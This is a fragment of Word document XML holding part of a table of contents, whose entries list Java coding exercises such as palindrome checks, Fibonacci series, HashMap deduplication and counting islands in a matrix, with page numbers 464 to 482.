              </w:rPr>
              <w:t>464</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B5A20AC" w14:textId="0304A8E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1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Remove the duplicate values from HashMap and return the max key from the HashMap.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307818 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>465</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BA4656A" w14:textId="31D8581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1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Return the maximum occurrence element from the array?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307819 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>466</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7CD361F4" w14:textId="4AE9CC7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2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Find Highest average score of student</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307820 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>467</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5461D4A9" w14:textId="4DFC03C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2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Find occurrence of Word in String</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307821 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>468</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48283D86" w14:textId="7663A29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2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Find the Words which starts with ‘S’ from List of Words</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307822 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>468</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4ACD0742" w14:textId="34F102F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2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Palindrome Number</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307823 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>469</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="369C570E" w14:textId="0C2E399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2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Reverse String without using reverse function (Use brute force approach)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307824 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>469</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26C47307" w14:textId="0CE6C18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2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Count of each word in a String</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307825 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>469</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="597D9D32" w14:textId="7C57265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2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Make all elements to Uppercase and create new ArrayList</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307826 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>470</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43047635" w14:textId="5072C00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2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PreOrder traversal</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307827 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>470</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D37B070" w14:textId="1AB5B96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2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Calculate average marks of Student and return Student object</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307828 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>471</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C7882B7" w14:textId="2B54875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2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Count of each Character in a String</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307829 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>472</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="363B9201" w14:textId="6157345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3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Find Employee with age greater than 15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307830 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>473</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="265CFD04" w14:textId="6741048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3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Get a list of files and directories by passing path of directory</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307831 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>474</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58635553" w14:textId="4EC0161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3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Find Output</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307832 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>475</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75CD26F1" w14:textId="128CC2B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3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Fibonacci series of nth number</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307833 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>476</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A5BEAED" w14:textId="3465A4A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3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Armstrong number</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307834 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>476</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13507E36" w14:textId="4E7B454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3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Print possible set of Palindrome for given String</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307835 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>477</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1206979D" w14:textId="6E6D972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3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Reverse of given number</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307836 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>478</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21F32C24" w14:textId="6B3D818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3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Minimum number of platform required for train</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307837 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>478</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08F12D35" w14:textId="4490BFA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3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Count number of island in a boolean 2D matrix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307838 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>479</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="276012B6" w14:textId="575C332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3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Shorten the given URL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307839 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>480</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BBA9C65" w14:textId="1A0DBDA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4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Find element closest to given target</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307840 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>481</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="310EA516" w14:textId="5008A8C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4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Remove duplicate element from list using java 8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307841 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>481</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19E00108" w14:textId="4E61CF2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4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Sort elements in array without inbuilt methods</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307842 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>482</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="419440AF" w14:textId="1131BF1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4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Find distinct ways to reach the nth stair</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
